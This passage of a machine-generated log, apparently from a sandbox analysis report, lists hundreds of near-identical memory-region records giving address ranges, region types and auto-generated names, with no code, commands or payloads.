start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19362 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19363 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19364 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19365 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19366 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19367 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19368 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19369 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19370 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19371 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19372 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19373 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19376 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19378 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19379 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19380 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19381 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19382 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19383 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19384 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19385 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19389 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19394 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19395 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19399 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19400 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19401 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19402 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19403 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19404 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19405 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19406 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19407 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19408 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19409 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19410 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19411 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19412 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19413 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19414 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19415 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19416 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19417 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19418 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19422 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19423 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19426 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19427 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19428 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19429 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19430 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19431 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 19432 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19433 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19434 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19435 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19436 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19437 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19438 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19439 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19440 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19441 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19442 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19443 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19444 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19445 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19446 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19447 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19448 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19449 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19450 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19451 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19452 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19453 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19454 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19455 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19456 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19457 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19458 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19459 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19460 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19461 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19462 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19463 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19464 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19465 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19466 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19467 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19468 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19469 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19470 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19471 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19474 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19475 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19478 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19479 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19480 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19482 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19486 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19487 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19488 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19489 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19490 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19491 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19492 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19494 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 19495 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19496 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19497 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19498 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19499 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19500 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19501 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19502 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19503 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19504 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19505 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19506 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19507 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19508 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19509 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19510 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19511 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19527 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19528 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19529 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19531 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19532 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19533 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19534 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19535 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19536 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19537 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19538 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19539 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19540 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19541 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19542 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19543 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19544 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19545 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19546 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 